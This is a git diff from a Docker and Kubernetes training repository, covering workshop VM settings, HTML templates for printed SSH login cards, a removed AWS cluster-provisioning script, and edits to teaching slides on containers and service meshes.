 engine_version: stable
 
 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.24.1
+compose_version: 1.22.0
 machine_version: 0.15.0
 
 # Password used to connect with the "docker user"

prepare-vms/settings/jerome.yaml

@@ -1,11 +1,8 @@
 # Number of VMs per cluster
 clustersize: 4
 
-# The hostname of each node will be clusterprefix + a number
-clusterprefix: node
-
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: cards.html
+cards_template: jerome.html
 
 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: Letter
@@ -21,9 +18,8 @@ paper_margin: 0.2in
 engine_version: stable
 
 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.24.1
+compose_version: 1.21.1
 machine_version: 0.14.0
 
 # Password used to connect with the "docker user"
 docker_user_password: training
-

prepare-vms/settings/kube101.yaml

@@ -3,11 +3,8 @@
 # Number of VMs per cluster
 clustersize: 3
 
-# The hostname of each node will be clusterprefix + a number
-clusterprefix: node
-
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: cards.html
+cards_template: kube101.html
 
 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: Letter
@@ -23,9 +20,8 @@ paper_margin: 0.2in
 engine_version: stable
 
 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.24.1
+compose_version: 1.21.1
 machine_version: 0.14.0
 
 # Password used to connect with the "docker user"
-docker_user_password: training
-
+docker_user_password: training

prepare-vms/settings/swarm.yaml

@@ -3,9 +3,6 @@
 # Number of VMs per cluster
 clustersize: 3
 
-# The hostname of each node will be clusterprefix + a number
-clusterprefix: node
-
 # Jinja2 template to use to generate ready-to-cut cards
 cards_template: cards.html
 
@@ -23,7 +20,7 @@ paper_margin: 0.2in
 engine_version: stable
 
 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.24.1
+compose_version: 1.22.0
 machine_version: 0.15.0
 
 # Password used to connect with the "docker user"

prepare-vms/setup-admin-clusters.sh

@@ -1,66 +0,0 @@
-#!/bin/sh
-set -e
-
-export AWS_INSTANCE_TYPE=t3a.small
-
-INFRA=infra/aws-us-west-2
-
-STUDENTS=2
-
-PREFIX=$(date +%Y-%m-%d-%H-%M)
-
-SETTINGS=admin-dmuc
-TAG=$PREFIX-$SETTINGS
-./workshopctl start \
-	--tag $TAG \
-	--infra $INFRA \
-	--settings settings/$SETTINGS.yaml \
-	--count $STUDENTS
-
-./workshopctl deploy $TAG
-./workshopctl disabledocker $TAG
-./workshopctl kubebins $TAG
-./workshopctl cards $TAG
-
-SETTINGS=admin-kubenet
-TAG=$PREFIX-$SETTINGS
-./workshopctl start \
-	--tag $TAG \
-	--infra $INFRA \
-	--settings settings/$SETTINGS.yaml \
-	--count $((3*$STUDENTS))
-
-./workshopctl disableaddrchecks $TAG
-./workshopctl deploy $TAG
-./workshopctl kubebins $TAG
-./workshopctl cards $TAG
-
-SETTINGS=admin-kuberouter
-TAG=$PREFIX-$SETTINGS
-./workshopctl start \
-	--tag $TAG \
-	--infra $INFRA \
-	--settings settings/$SETTINGS.yaml \
-	--count $((3*$STUDENTS))
-
-./workshopctl disableaddrchecks $TAG
-./workshopctl deploy $TAG
-./workshopctl kubebins $TAG
-./workshopctl cards $TAG
-
-#INFRA=infra/aws-us-west-1
-
-export AWS_INSTANCE_TYPE=t3a.medium
-
-SETTINGS=admin-test
-TAG=$PREFIX-$SETTINGS
-./workshopctl start \
-	--tag $TAG \
-	--infra $INFRA \
-	--settings settings/$SETTINGS.yaml \
-	--count $((3*$STUDENTS))
-
-./workshopctl deploy $TAG
-./workshopctl kube $TAG 1.13.5
-./workshopctl cards $TAG
-

prepare-vms/templates/cards.html

@@ -1,88 +1,29 @@
 {# Feel free to customize or override anything in there! #}
-
-{%- set url = "http://FIXME.container.training/" -%}
-{%- set pagesize = 9 -%}
-{%- set lang = "en" -%}
-{%- set event = "training session" -%}
-{%- set backside = False -%}
-{%- set image = "kube" -%}
-{%- set clusternumber = 100 -%}
-
-{%- set image_src = {
-	"docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
-	"swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
-	"kube": "https://avatars1.githubusercontent.com/u/13629408",
-	"enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
-    }[image] -%}
-{%- if lang == "en" and clustersize == 1 -%}
-	{%- set intro -%}
-	Here is the connection information to your very own
-	machine for this {{ event }}.
-	You can connect to this VM with any SSH client.
-	{%- endset -%}
-    {%- set listhead -%}
-    Your machine is:
-	{%- endset -%}
-{%- endif -%}
-{%- if lang == "en" and clustersize != 1 -%}
-	{%- set intro -%}
-	Here is the connection information to your very own
-	cluster for this {{ event }}.
-	You can connect to each VM with any SSH client.
-	{%- endset -%}
-    {%- set listhead -%}
-    Your machines are:
-	{%- endset -%}
-{%- endif -%}
-{%- if lang == "fr" and clustersize == 1 -%}
-	{%- set intro -%}
-	Voici les informations permettant de se connecter à votre
-	machine pour cette formation.
-	Vous pouvez vous connecter à cette machine virtuelle
-	avec n'importe quel client SSH.
-	{%- endset -%}
-    {%- set listhead -%}
-    Adresse IP:
-	{%- endset -%}
-{%- endif -%}
-{%- if lang == "en" and clusterprefix != "node" -%}
-	{%- set intro -%}
-    Here is the connection information for the
-    <strong>{{ clusterprefix }}</strong> environment.
-	{%- endset -%}
-{%- endif -%}
-{%- if lang == "fr" and clustersize != 1 -%}
-	{%- set intro -%}
-	Voici les informations permettant de se connecter à votre
-	cluster pour cette formation.
-	Vous pouvez vous connecter à chaque machine virtuelle
-	avec n'importe quel client SSH.
-	{%- endset -%}
-    {%- set listhead -%}
-	Adresses IP:
-	{%- endset -%}
-{%- endif -%}
-{%- if lang == "en"  -%}
-	{%- set slides_are_at -%}
-	You can find the slides at:
-	{%- endset -%}
-{%- endif -%}
-{%- if lang == "fr" -%}
-	{%- set slides_are_at -%}
-  	Le support de formation est à l'adresse suivante :
-	{%- endset -%}
+{%- set url = "http://container.training/" -%}
+{%- set pagesize = 12 -%}
+{%- if clustersize == 1 -%}
+    {%- set workshop_name = "Docker workshop" -%}
+    {%- set cluster_or_machine = "machine" -%}
+    {%- set this_or_each = "this" -%}
+    {%- set machine_is_or_machines_are = "machine is" -%}
+    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
+{%- else -%}
+    {%- set workshop_name = "orchestration workshop" -%}
+    {%- set cluster_or_machine = "cluster" -%}
+    {%- set this_or_each = "each" -%}
+    {%- set machine_is_or_machines_are = "machines are" -%}
+    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
+    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
+    {%- set image_src = image_src_swarm -%}
 {%- endif -%}
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
 <html>
 <head><style>
-@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
-
 body, table {
     margin: 0;
     padding: 0;
     line-height: 1em;
-    font-size: 15px;
-    font-family: 'Slabo 27px';
+    font-size: 14px;
 }
 
 table {
@@ -96,54 +37,24 @@ table {
 div {
     float: left;
     border: 1px dotted black;
-    {% if backside %}
-    height: 31%;
-    {% endif %}
     padding-top: 1%;
     padding-bottom: 1%;
     /* columns * (width+left+right) < 100% */
-    /*
     width: 21.5%;
     padding-left: 1.5%;
     padding-right: 1.5%;
-    */
-    /**/
-    width: 30%;
-    padding-left: 1.5%;
-    padding-right: 1.5%;
-    /**/    
 }
 
 p {
     margin: 0.4em 0 0.4em 0;
 }
 
-div.back {
-	border: 1px dotted white;
-}
-
-div.back p {
-    margin: 0.5em 1em 0 1em;
-}
-
 img {
     height: 4em;
     float: right;
-    margin-right: -0.2em;
+    margin-right: -0.4em;
 }
 
-/*
-img.enix {
-    height: 4.0em;
-    margin-top: 0.4em;
-}
-
-img.kube {
-    height: 4.2em;
-    margin-top: 1.7em;
-}
-*/
-
 .logpass {
     font-family: monospace;
     font-weight: bold;
@@ -158,15 +69,19 @@ img.kube {
 </style></head>
 <body>
 {% for cluster in clusters %}
+    {% if loop.index0>0 and loop.index0%pagesize==0 %}
+        <span class="pagebreak"></span>
+    {% endif %}
     <div>
-        <p>{{ intro }}</p>
+
+        <p>
+            Here is the connection information to your very own
+            {{ cluster_or_machine }} for this {{ workshop_name }}.
+            You can connect to {{ this_or_each }} VM with any SSH client.
+        </p>
         <p>
             <img src="{{ image_src }}" />
             <table>
-            	{% if clusternumber != None %}
-	            <tr><td>cluster:</td></tr>
-	            <tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
-            	{% endif %}
                 <tr><td>login:</td></tr>
                 <tr><td class="logpass">docker</td></tr>
                 <tr><td>password:</td></tr>
@@ -175,44 +90,17 @@ img.kube {
 
         </p>
         <p>
-            {{ listhead }}
+            Your {{ machine_is_or_machines_are }}:
             <table>
                 {% for node in cluster %}
-                <tr>
-                	<td>{{ clusterprefix }}{{ loop.index }}:</td>
-                	<td>{{ node }}</td>
-                </tr>
+                <tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
                 {% endfor %}
             </table>
         </p>
-
-        <p>
-        	{{ slides_are_at }}
+        <p>You can find the slides at:
             <center>{{ url }}</center>
         </p>
     </div>
-    {% if loop.index%pagesize==0 or loop.last %}
-        <span class="pagebreak"></span>
-        {% if backside %}
-			{% for x in range(pagesize) %}
-		        <div class="back">
-		        <br/>
-				<p>You got this at the workshop
-				"Getting Started With Kubernetes and Container Orchestration"
-				during QCON London (March 2019).</p>
-				<p>If you liked that workshop,
-				I can train your team or organization
-				on Docker, container, and Kubernetes,
-				with curriculums of 1 to 5 days.
-				</p>
-				<p>Interested? Contact me at:</p>
-				<p>jerome.petazzoni@gmail.com</p>
-				<p>Thank you!</p>
-		        </div>
-			{% endfor %}
-		<span class="pagebreak"></span>
-		{% endif %}
-    {% endif %}
 {% endfor %}
 </body>
 </html>

prepare-vms/templates/enix.html

@@ -0,0 +1,117 @@
+{# Feel free to customize or override anything in there! #}
+{%- set url = "http://septembre2018.container.training" -%}
+{%- set pagesize = 9 -%}
+{%- if clustersize == 1 -%}
+    {%- set workshop_name = "Docker workshop" -%}
+    {%- set cluster_or_machine = "machine" -%}
+    {%- set this_or_each = "this" -%}
+    {%- set machine_is_or_machines_are = "machine is" -%}
+    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
+{%- else -%}
+    {%- set workshop_name = "Kubernetes workshop" -%}
+    {%- set cluster_or_machine = "cluster" -%}
+    {%- set this_or_each = "each" -%}
+    {%- set machine_is_or_machines_are = "machines are" -%}
+    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
+    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
+    {%- set image_src = image_src_kube -%}
+{%- endif -%}
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head><style>
+body, table {
+    margin: 0;
+    padding: 0;
+    line-height: 1em;
+    font-size: 14px;
+}
+
+table {
+    border-spacing: 0;
+    margin-top: 0.4em;
+    margin-bottom: 0.4em;
+    border-left: 0.8em double grey;
+    padding-left: 0.4em;
+}
+
+div {
+    float: left;
+    border: 1px dotted black;
+    padding-top: 1%;
+    padding-bottom: 1%;
+    /* columns * (width+left+right) < 100% */
+    width: 30%;
+    padding-left: 1.5%;
+    padding-right: 1.5%;
+}
+
+p {
+    margin: 0.4em 0 0.4em 0;
+}
+
+img {
+    height: 4em;
+    float: right;
+    margin-right: -0.3em;
+}
+
+img.enix {
+    height: 4.5em;
+    margin-top: 0.2em;
+}
+
+img.kube {
+    height: 4.2em;
+    margin-top: 1.7em;
+}
+
+.logpass {
+    font-family: monospace;
+    font-weight: bold;
+}
+
+.pagebreak {
+    page-break-after: always;
+    clear: both;
+    display: block;
+    height: 8px;
+}
+</style></head>
+<body>
+{% for cluster in clusters %}
+    {% if loop.index0>0 and loop.index0%pagesize==0 %}
+        <span class="pagebreak"></span>
+    {% endif %}
+    <div>
+
+        <p>
+            Voici les informations permettant de se connecter à votre
+            cluster pour cette formation. Vous pouvez vous connecter
+	    à ces machines virtuelles avec n'importe quel client SSH.
+        </p>
+        <p>
+	    <img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
+            <table>
+                <tr><td>identifiant:</td></tr>
+                <tr><td class="logpass">docker</td></tr>
+                <tr><td>mot de passe:</td></tr>
+                <tr><td class="logpass">{{ docker_user_password }}</td></tr>
+            </table>
+
+        </p>
+        <p>
+            Vos serveurs sont :
+            <img class="kube" src="{{ image_src }}" />
+            <table>
+                {% for node in cluster %}
+                <tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
+                {% endfor %}
+            </table>
+        </p>
+        <p>Le support de formation est à l'adresse suivante :
+            <center>{{ url }}</center>
+        </p>
+    </div>
+{% endfor %}
+</body>
+</html>

prepare-vms/templates/jerome.html

@@ -0,0 +1,131 @@
+{# Feel free to customize or override anything in there! #}
+{%- set url = "http://qconsf2018.container.training/" -%}
+{%- set pagesize = 9 -%}
+{%- if clustersize == 1 -%}
+    {%- set workshop_name = "Docker workshop" -%}
+    {%- set cluster_or_machine = "machine" -%}
+    {%- set this_or_each = "this" -%}
+    {%- set machine_is_or_machines_are = "machine is" -%}
+    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
+{%- else -%}
+    {%- set workshop_name = "Kubernetes workshop" -%}
+    {%- set cluster_or_machine = "cluster" -%}
+    {%- set this_or_each = "each" -%}
+    {%- set machine_is_or_machines_are = "machines are" -%}
+    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
+    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
+    {%- set image_src = image_src_kube -%}
+{%- endif -%}
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head><style>
+@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
+body, table {
+    margin: 0;
+    padding: 0;
+    line-height: 1.0em;
+    font-size: 15px;
+    font-family: 'Slabo 27px';
+}
+
+table {
+    border-spacing: 0;
+    margin-top: 0.4em;
+    margin-bottom: 0.4em;
+    border-left: 0.8em double grey;
+    padding-left: 0.4em;
+}
+
+div {
+    float: left;
+    border: 1px dotted black;
+    height: 31%;
+    padding-top: 1%;
+    padding-bottom: 1%;
+    /* columns * (width+left+right) < 100% */
+    width: 30%;
+    padding-left: 1.5%;
+    padding-right: 1.5%;
+}
+
+div.back {
+	border: 1px dotted white;
+}
+
+div.back p {
+    margin: 0.5em 1em 0 1em;
+}
+
+p {
+    margin: 0.4em 0 0.8em 0;
+}
+
+img {
+    height: 5em;
+    float: right;
+    margin-right: 1em;
+}
+
+.logpass {
+    font-family: monospace;
+    font-weight: bold;
+}
+
+.pagebreak {
+    page-break-after: always;
+    clear: both;
+    display: block;
+    height: 8px;
+}
+</style></head>
+<body>
+{% for cluster in clusters %}
+    <div>
+
+        <p>
+            Here is the connection information to your very own
+            {{ cluster_or_machine }} for this {{ workshop_name }}.
+            You can connect to {{ this_or_each }} VM with any SSH client.
+        </p>
+        <p>
+            <img src="{{ image_src }}" />
+            <table>
+                <tr><td>login:</td></tr>
+                <tr><td class="logpass">docker</td></tr>
+                <tr><td>password:</td></tr>
+                <tr><td class="logpass">{{ docker_user_password }}</td></tr>
+            </table>
+
+        </p>
+        <p>
+            Your {{ machine_is_or_machines_are }}:
+            <table>
+                {% for node in cluster %}
+                <tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
+                {% endfor %}
+            </table>
+        </p>
+        <p>You can find the slides at:
+            <center>{{ url }}</center>
+        </p>
+    </div>
+    {% if loop.index%pagesize==0 or loop.last %}
+        <span class="pagebreak"></span>
+	{% for x in range(pagesize) %}
+        <div class="back">
+        <br/>
+		<p>You got this card at the workshop "Getting Started With Kubernetes and Container Orchestration"
+		during QCON San Francisco (November 2018).</p>
+		<p>That workshop was a 1-day version of a longer curriculum.</p>
+		<p>If you liked that workshop, the instructor (Jérôme Petazzoni) can deliver it
+		(or the longer version) to your team or organization.</p>
+		<p>You can reach him at:</p>
+		<p>jerome.petazzoni@gmail.com</p>
+		<p>Thank you!</p>
+        </div>
+	{% endfor %}
+	<span class="pagebreak"></span>
+    {% endif %}
+{% endfor %}
+</body>
+</html>

prepare-vms/templates/kube101.html

@@ -0,0 +1,106 @@
+{# Feel free to customize or override anything in there! #}
+{%- set url = "http://container.training/" -%}
+{%- set pagesize = 12 -%}
+{%- if clustersize == 1 -%}
+    {%- set workshop_name = "Docker workshop" -%}
+    {%- set cluster_or_machine = "machine" -%}
+    {%- set this_or_each = "this" -%}
+    {%- set machine_is_or_machines_are = "machine is" -%}
+    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
+{%- else -%}
+    {%- set workshop_name = "Kubernetes workshop" -%}
+    {%- set cluster_or_machine = "cluster" -%}
+    {%- set this_or_each = "each" -%}
+    {%- set machine_is_or_machines_are = "machines are" -%}
+    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
+    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
+    {%- set image_src = image_src_kube -%}
+{%- endif -%}
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head><style>
+body, table {
+    margin: 0;
+    padding: 0;
+    line-height: 1em;
+    font-size: 14px;
+}
+
+table {
+    border-spacing: 0;
+    margin-top: 0.4em;
+    margin-bottom: 0.4em;
+    border-left: 0.8em double grey;
+    padding-left: 0.4em;
+}
+
+div {
+    float: left;
+    border: 1px dotted black;
+    padding-top: 1%;
+    padding-bottom: 1%;
+    /* columns * (width+left+right) < 100% */
+    width: 21.5%;
+    padding-left: 1.5%;
+    padding-right: 1.5%;
+}
+
+p {
+    margin: 0.4em 0 0.4em 0;
+}
+
+img {
+    height: 4em;
+    float: right;
+    margin-right: -0.4em;
+}
+
+.logpass {
+    font-family: monospace;
+    font-weight: bold;
+}
+
+.pagebreak {
+    page-break-after: always;
+    clear: both;
+    display: block;
+    height: 8px;
+}
+</style></head>
+<body>
+{% for cluster in clusters %}
+    {% if loop.index0>0 and loop.index0%pagesize==0 %}
+        <span class="pagebreak"></span>
+    {% endif %}
+    <div>
+
+        <p>
+            Here is the connection information to your very own
+            {{ cluster_or_machine }} for this {{ workshop_name }}.
+            You can connect to {{ this_or_each }} VM with any SSH client.
+        </p>
+        <p>
+            <img src="{{ image_src }}" />
+            <table>
+                <tr><td>login:</td></tr>
+                <tr><td class="logpass">docker</td></tr>
+                <tr><td>password:</td></tr>
+                <tr><td class="logpass">{{ docker_user_password }}</td></tr>
+            </table>
+
+        </p>
+        <p>
+            Your {{ machine_is_or_machines_are }}:
+            <table>
+                {% for node in cluster %}
+                <tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
+                {% endfor %}
+            </table>
+        </p>
+        <p>You can find the slides at:
+            <center>{{ url }}</center>
+        </p>
+    </div>
+{% endfor %}
+</body>
+</html>

slides/Dockerfile

@@ -1,4 +0,0 @@
-FROM alpine:3.9
-RUN apk add --no-cache entr py-pip git
-COPY requirements.txt .
-RUN pip install -r requirements.txt

slides/README.md

@@ -34,14 +34,6 @@ compile each `foo.yml` file into `foo.yml.html`.
 You can also run `./build.sh forever`: it will monitor the current
 directory and rebuild slides automatically when files are modified.
 
-If you have problems running `./build.sh` (because of
-Python dependencies or whatever),
-you can also run `docker-compose up` in this directory.
-It will start the `./build.sh forever` script in a container.
-It will also start a web server exposing the slides
-(but the slides should also work if you load them from your
-local filesystem).
-
 
 ## Publishing pipeline
 
@@ -61,4 +53,4 @@ You can run `./slidechecker foo.yml.html` to check for
 missing images and show the number of slides in that deck.
 It requires `phantomjs` to be installed. It takes some
 time to run so it is not yet integrated with the publishing
-pipeline.
+pipeline.

slides/_redirects

@@ -1,7 +1 @@
-# Uncomment and/or edit one of the the following lines if necessary.
-#/ /kube-halfday.yml.html 200
-#/ /kube-fullday.yml.html 200
-#/ /kube-twodays.yml.html 200
-
-# And this allows to do "git clone https://container.training".
-/info/refs service=git-upload-pack https://github.com/jpetazzo/container.training/info/refs?service=git-upload-pack
+/ /kube-fullday.yml.html 200!

slides/assignments/TODO.txt

@@ -1,34 +0,0 @@
-# Our sample application
-
-No assignment
-
-# Kubernetes concepts
-
-Do we want some kind of multiple-choice quiz?
-
-# First contact with kubectl
-
-Start some pre-defined image and check its logs
-(Do we want to make a custom "mystery image" that shows a message
-and then sleeps forever?)
-
-Start another one (to make sure they understand that they need
-to specify a unique name each time)
-
-Provide as many ways as you can to figure out on which node
-these pods are running (even if you only have one node).
-
-# Exposing containers
-
-Start a container running the official tomcat image.
-Expose it.
-Connect to it.
-
-# Shipping apps
-
-(We need a few images for a demo app other than DockerCoins?)
-
-Start the components of the app.
-Expose what needs to be exposed.
-Connect to the app and check that it works.
-

slides/assignments/setup.md

@@ -1,105 +0,0 @@
-## Assignment: get Kubernetes
-
-- In order to do the other assignments, we need a Kubernetes cluster
-
-- Here are some *free* options:
-
-  - Docker Desktop
-
-  - Minikube
-
-  - Online sandbox like Katacoda
-
-- You can also get a managed cluster (but this costs some money)
-
----
-
-## Recommendation 1: Docker Desktop
-
-- If you are already using Docker Desktop, use it for Kubernetes
-
-- If you are running MacOS, [install Docker Desktop](https://docs.docker.com/docker-for-mac/install/)
-
-  - you will need a post-2010 Mac
-
-  - you will need macOS Sierra 10.12 or later
-
-- If you are running Windows 10, [install Docker Desktop](https://docs.docker.com/docker-for-windows/install/)
-
-  - you will need Windows 10 64 bits Pro, Enterprise, or Education
-
-  - virtualization needs to be enabled in your BIOS
-
-- Then [enable Kubernetes](https://blog.docker.com/2018/07/kubernetes-is-now-available-in-docker-desktop-stable-channel/) if it's not already on
-
----
-
-## Recommendation 2: Minikube
-
-- In some scenarios, you can't use Docker Desktop:
-
-  - if you run Linux
-
-  - if you are running an unsupported version of Windows
-
-- You might also want to install Minikube for other reasons
-
-  (there are more tutorials and instructions out there for Minikube)
-
-- Minikube installation is a bit more complex
-
-  (depending on which hypervisor and OS you are using)
-
----
-
-## Minikube installation details
-
-- Minikube typically runs in a local virtual machine
-
-- It supports multiple hypervisors:
-
-  - VirtualBox (Linux, Mac, Windows)
-
-  - HyperV (Windows)
-
-  - HyperKit, VMware (Mac)
-
-  - KVM (Linux)
-
-- Check the [documentation](https://kubernetes.io/docs/tasks/tools/install-minikube/) for details relevant to your setup
-
----
-
-## Recommendation 3: learning platform
-
-- Sometimes, you can't even install Minikube
-
-  (computer locked by IT policies; insufficient resources...)
-
-- In that case, you can use a platform like:
-
-  - Katacoda
-
-  - Play-with-Kubernetes
-
----
-
-## Recommendation 4: hosted cluster
-
-- You can also get your own hosted cluster
-
-- This will cost a little bit of money
-
-  (unless you have free hosting credits)
-
-- Setup will vary depending on the provider, platform, etc.
-
----
-
-class: assignment
-
-- Make sure that you have a Kubernetes cluster
-
-- You should be able to run `kubectl get nodes` and see a list of nodes
-
-- These nodes should be in `Ready` state

slides/containers/Ambassadors.md

@@ -150,84 +150,21 @@ Different deployments will use different underlying technologies.
 * Ad-hoc deployments can use a master-less discovery protocol
   like avahi to register and discover services.
 * It is also possible to do one-shot reconfiguration of the
-  ambassadors. It is slightly less dynamic but has far fewer
+  ambassadors. It is slightly less dynamic but has much less
   requirements.
 * Ambassadors can be used in addition to, or instead of, overlay networks.
 
 ---
 
-## Service meshes
+## Section summary
 
-* A service mesh is a configurable network layer.
+We've learned how to:
 
-* It can provide service discovery, high availability, load balancing, observability...
+* Understand the ambassador pattern and what it is used for (service portability).
 
-* Service meshes are particularly useful for microservices applications.
+For more information about the ambassador pattern, including demos on Swarm and ECS: 
 
-* Service meshes are often implemented as proxies.
+* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
 
-* Applications connect to the service mesh, which relays the connection where needed.
+* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
 
-*Does that sound familiar?*
-
----
-
-## Ambassadors and service meshes
-
-* When using a service mesh, a "sidecar container" is often used as a proxy
-
-* Our services connect (transparently) to that sidecar container
-
-* That sidecar container figures out where to forward the traffic
-
-... Does that sound familiar?
-
-(It should, because service meshes are essentially app-wide or cluster-wide ambassadors!)
-
----
-
-## Some popular service meshes
-
-... And related projects:
-
-* [Consul Connect](https://www.consul.io/docs/connect/index.html)
-  <br/>
-  Transparently secures service-to-service connections with mTLS.
-
-* [Gloo](https://gloo.solo.io/)
-  <br/>
-  API gateway that can interconnect applications on VMs, containers, and serverless.
-
-* [Istio](https://istio.io/)
-  <br/>
-  A popular service mesh.
-
-* [Linkerd](https://linkerd.io/)
-  <br/>
-  Another popular service mesh.
-
----
-
-## Learning more about service meshes
-
-A few blog posts about service meshes:
-
-* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
-  <br/>
-  Provides historical context: how did we do before service meshes were invented?
-
-* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
-  <br/>
-  Explains the purpose of service meshes. Illustrates some NGINX features.
-
-* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
-  <br/>
-  Includes high-level overview and definitions.
-
-* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
-  <br/>
-  Includes a step-by-step demo of Linkerd.
-
-And a video:
-
-* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)

slides/containers/Application_Configuration.md

@@ -36,7 +36,7 @@ docker run jpetazzo/hamba 80 www1:80 www2:80
 
 * Appropriate for mandatory parameters (without which the service cannot start).
 
-* Convenient for "toolbelt" services instantiated many times.
+* Convenient for "toolbelt" services instanciated many times.
 
   (Because there is no extra step: just run it!)
 
@@ -63,7 +63,7 @@ docker run -e ELASTICSEARCH_URL=http://es42:9201/ kibana
 
 * Appropriate for optional parameters (since the image can provide default values).
 
-* Also convenient for services instantiated many times.
+* Also convenient for services instanciated many times.
 
   (It's as easy as command-line parameters.)
 
@@ -98,13 +98,13 @@ COPY prometheus.conf /etc
 
 * Allows arbitrary customization and complex configuration files.
 
-* Requires writing a configuration file. (Obviously!)
+* Requires to write a configuration file. (Obviously!)
 
-* Requires building an image to start the service.
+* Requires to build an image to start the service.
 
-* Requires rebuilding the image to reconfigure the service.
+* Requires to rebuild the image to reconfigure the service.
 
-* Requires rebuilding the image to upgrade the service.
+* Requires to rebuild the image to upgrade the service.
 
 * Configured images can be stored in registries.
 
@@ -132,11 +132,11 @@ docker run -v appconfig:/etc/appconfig myapp
 
 * Allows arbitrary customization and complex configuration files.
 
-* Requires creating a volume for each different configuration.
+* Requires to create a volume for each different configuration.
 
 * Services with identical configurations can use the same volume.
 
-* Doesn't require building / rebuilding an image when upgrading / reconfiguring.
+* Doesn't require to build / rebuild an image when upgrading / reconfiguring.
 
 * Configuration can be generated or edited through another container.
 
@@ -198,4 +198,4 @@ E.g.:
 
 - read the secret on stdin when the service starts,
 
-- pass the secret using an API endpoint.
+- pass the secret using an API endpoint.

slides/containers/Background_Containers.md

@@ -144,10 +144,6 @@ At a first glance, it looks like this would be particularly useful in scripts.
 However, if we want to start a container and get its ID in a reliable way,
 it is better to use `docker run -d`, which we will cover in a bit.
 
-(Using `docker ps -lq` is prone to race conditions: what happens if someone
-else, or another program or script, starts another container just before
-we run `docker ps -lq`?)
-
 ---
 
 ## View the logs of a container
@@ -257,7 +253,7 @@ $ docker kill 068 57ad
 The `stop` and `kill` commands can take multiple container IDs.
 
 Those containers will be terminated immediately (without
-the 10-second delay).
+the 10 seconds delay).
 
 Let's check that our containers don't show up anymore:
 

slides/containers/Building_Images_With_Dockerfiles.md

@@ -131,12 +131,6 @@ Sending build context to Docker daemon 2.048 kB
 
 * Be careful (or patient) if that directory is big and your link is slow.
 
-* You can speed up the process with a [`.dockerignore`](https://docs.docker.com/engine/reference/builder/#dockerignore-file) file 
-
-  * It tells docker to ignore specific files in the directory
-
-  * Only ignore files that you won't need in the build context!
-
 ---
 
 ## Executing each step

slides/containers/Cmd_And_Entrypoint.md

@@ -222,16 +222,16 @@ CMD ["hello world"]
 Let's build it:
 
 ```bash
-$ docker build -t myfiglet .
+$ docker build -t figlet .
 ...
 Successfully built 6e0b6a048a07
-Successfully tagged myfiglet:latest
+Successfully tagged figlet:latest
 ```
 
 Run it without parameters:
 
 ```bash
-$ docker run myfiglet
+$ docker run figlet
  _          _   _                             _        
 | |        | | | |                           | |    |  
 | |     _  | | | |  __             __   ,_   | |  __|  
@@ -246,7 +246,7 @@ $ docker run myfiglet
 Now let's pass extra arguments to the image.
 
 ```bash
-$ docker run myfiglet hola mundo
+$ docker run figlet hola mundo
  _           _                                               
 | |         | |                                      |       
 | |     __  | |  __,     _  _  _           _  _    __|   __  
@@ -262,13 +262,13 @@ We overrode `CMD` but still used `ENTRYPOINT`.
 
 What if we want to run a shell in our container?
 
-We cannot just do `docker run myfiglet bash` because
+We cannot just do `docker run figlet bash` because
 that would just tell figlet to display the word "bash."
 
 We use the `--entrypoint` parameter:
 
 ```bash
-$ docker run -it --entrypoint bash myfiglet
+$ docker run -it --entrypoint bash figlet
 root@6027e44e2955:/# 
 ```
 

